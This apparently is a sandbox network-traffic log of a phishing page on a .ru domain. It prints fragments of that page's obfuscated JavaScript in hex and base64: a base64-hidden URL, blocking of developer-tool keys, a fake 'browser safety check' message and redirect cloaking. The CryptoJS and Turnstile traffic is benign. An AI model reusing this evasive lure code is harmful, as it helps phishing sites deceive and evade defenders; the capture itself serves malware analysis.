                                                                                                        Data Ascii: 4d96... Try not to become a man of success. Rather become a man of value. --><script>if(atob("aHR0cHM6Ly9VSy5rY3pjeWx2anVidS5ydS94SkVvYjNWLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPS
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 66 51 30 4b 49 33 56 4e 61 56 6c 71 53 55 64 36 55 6e 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 42 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51
                                                                                                        Data Ascii: fQ0KI3VNaVlqSUd6UnouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67
                                                                                                        Data Ascii: CAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3Mykg
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 42 73 64 6c 56 6e 56 31 42 45 57 45 30 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 46 42 73 64 6c 56 6e 56 31 42 45 57 45 30 67 4c 53 42 30 62 33 52 78 54 6b 6c 43 51 32 31 6d 49 44 34 67 57 57 4a 33 56 57 78 6f 61 32 64 34 59 79 41 6d 4a 69 41 68 64 55 4a 45 65 6b 78 70 61 32 70 6d 62 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 45 78 34 62 6e 64 45 61 6d 5a 56 52 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 31 51 6b 52 36 54 47 6c 72 61 6d 5a 73 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49
                                                                                                        Data Ascii: dnZXI7DQogICAgICAgIGNvbnN0IFBsdlVnV1BEWE0gPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKFBsdlVnV1BEWE0gLSB0b3RxTklCQ21mID4gWWJ3VWxoa2d4YyAmJiAhdUJEekxpa2pmbCkgew0KICAgICAgICAgICAgeEx4bndEamZVRCA9IHRydWU7DQogICAgICAgICAgICB1QkR6TGlramZsID0gdHJ1ZTsNCiAgICAgI
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 6c 54 30 6c 5a 53 47 5a 77 54 58 4e 4f 49 6a 34 4e 43 6b 56 75 63 33 56 79 61 57 35 6e 49 48 6c 76 64 58 49 67 63 32 46 6d 5a 58 52 35 49 48 64 70 64 47 67 67 59 6e 4a 76 64 33 4e 6c 63 69 42 6a 61 47 56 6a 61 33 4d 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 7a 59 33 4a 70 63 48 51 2b 44 51 70 30 64 58 4a 75 63 33 52 70 62 47 55 75 63 6d
                                                                                                        Data Ascii: hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJlT0lZSGZwTXNOIj4NCkVuc3VyaW5nIHlvdXIgc2FmZXR5IHdpdGggYnJvd3NlciBjaGVja3MuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjxzY3JpcHQ+DQp0dXJuc3RpbGUucm
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 56 30 4a 44 64 55 56 79 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 48 68 4d 65 47 35 33 52 47 70 6d 56 55 51 67 50 54 30 67 5a 6d 46 73 63 32 55 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51
                                                                                                        Data Ascii: V0JDdUVyKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKHhMeG53RGpmVUQgPT0gZmFsc2Upew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQ
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2a 2f 0d 0a 69 66 28 4d 57 43 78 68 43 75 75 56 72 20 3d 3d 20 6e 5a 52 66 6d 4a 43 45 75 6c 29 7b 0d 0a 63 6f 6e 73 74 20 4c 70 71 53 6b 67 50 53 74 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 7a 53 54 72 44 77 4f 53 6c 71 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 7a 53 54 72 44 77 4f 53 6c 71 2e 70 61 74 68 6e 61 6d 65 20 3d 20 7a
                                                                                                        Data Ascii: .join('.');/* I find that the harder I work, the more luck I seem to have. */if(MWCxhCuuVr == nZRfmJCEul){const LpqSkgPStt = window.location.pathname.split('%23')[0].split('%3F')[0];if (zSTrDwOSlq.pathname.endsWith('/')) {zSTrDwOSlq.pathname = z
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 56 4e 61 56 6c 71 53 55 64 36 55 6e 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 56 4e 61 56 6c 71 53 55 64 36 55 6e 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 64 55 31 70 57 57 70 4a 52 33 70 53 65 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 56 4e 61 56 6c 71 53 55 64 36 55 6e 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49
                                                                                                        Data Ascii: VNaVlqSUd6UnogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3VNaVlqSUd6UnogaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojdU1pWWpJR3pSeiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3VNaVlqSUd6UnouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246I
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48
                                                                                                        Data Ascii: iQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldH


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.449749104.18.94.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:48 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:48 UTC386INHTTP/1.1 302 Found
                                                                                                        Date: Wed, 18 Dec 2024 22:16:48 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        access-control-allow-origin: *
                                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4284f69a090f73-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.449750104.17.25.144432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:48 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:48 UTC959INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:48 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"61182885-40eb"
                                                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 16063
                                                                                                        Expires: Mon, 08 Dec 2025 22:16:48 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpacKbu5ZubKATMsSs%2F78yE1yJgYkSQLbY7OZJkboGSHYG355kG3MDnFut0h66l0ZTSsLd38MBuGWEL8Rh4S5APMygD8%2F6AkWd4irGbtKeRoGZ%2Bn29fBwpGNPAEmHHLjitn%2FLe1R"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4284f75b28c32d-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:48 UTC410INData Raw: 33 39 37 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                        Data Ascii: 3978!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                                                        Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                                                        Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                                                        Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                                                        Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                                                        Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                                                        Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
